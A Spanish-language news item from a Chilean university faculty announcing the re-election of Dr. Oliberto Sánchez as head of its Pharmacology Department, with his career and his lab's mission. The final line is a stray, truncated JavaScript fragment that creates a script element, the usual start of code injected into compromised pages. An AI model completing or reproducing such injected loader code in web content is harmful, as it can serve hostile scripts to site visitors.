Oliberto Sánchez

Dr. Oliberto Sánchez, Director Departamento Farmacología de la Facultad de Ciencias Biológicas de la Universidad de Concepción

El Dr. Oliberto Sánchez resultó elegido nuevamente como Director del Departamento de Farmacología de nuestra Facultad de Ciencias Biológicas. Este nombramiento se extenderá por el lapso de dos años a partir del 27 de mayo de 2016.

El Dr. Sánchez es Doctor en Ciencias Biológicas por la Universidad de La Habana, Cuba. Comenzó a trabajar el año 2009 en la Universidad de Concepción, como colaborador académico del Departamento de Fisiopatología, luego, el 2010 se desempeñó como profesor asociado del Departamento de Farmacología, periodo en el cual pudo participar activamente en la implementación de los laboratorios de Biofármacos Recombinantes, con instalaciones para manipulación de ADN, proteínas, cultivos celulares y virología, que se tradujeron en el ingreso de un número importante de estudiantes al pre y postgrado.

Hoy es Jefe de Laboratorio de Biofármacos Recombinantes  que comenzó a funcionar oficialmente el año 2010 siendo los primeros estudiantes en ingresar: Camila Beltrán, Felipe Bravo, Ma. Francisca Starck y Eduardo Durán, los cuales comenzaron a desarrollar investigaciones de FSH recombinante y virus Hanta. La primeras líneas de financiamiento obtenidas fueron los proyectos FONDEF D10I282 y el FONDECYT 1110925.

Como se manifiesta en la Misión del Laboratorio antes mencionado: «El laboratorio tiene como misión principal la realización de investigación aplicada al desarrollo de nuevos productos, procesos o aplicaciones vinculados al sector biofarmacéutico. En el plano académico, nuestra misión es contribuir a la formación integral de nuestros estudiantes de pre y postgrado, dotándolos de los conocimientos y herramientas necesarias para hacer investigación en biología celular y molecular aplicada, y brindándoles un visión global de los problemas, desafío y posibles soluciones asociados al sector biomédico y veterinario. Nuestro propósito final es formar estudiantes con las capacidades para desarrollarse profesionalmente dentro de la industria biofarmacéutica o para emprender sus propios negocios de base tecnológica.»

var d=document;var s=d.createElement(‘script’);